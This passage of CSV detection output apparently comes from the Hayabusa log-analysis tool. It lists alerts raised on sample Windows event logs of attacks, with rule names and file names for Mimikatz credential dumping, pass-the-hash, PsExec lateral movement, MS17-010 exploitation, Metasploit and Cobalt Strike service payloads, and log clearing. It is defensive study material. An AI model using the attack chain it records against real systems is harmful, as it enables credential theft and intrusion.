Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx +2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" +2021-04-21 22:30:00.589 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\eviltask timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx +2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx +2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 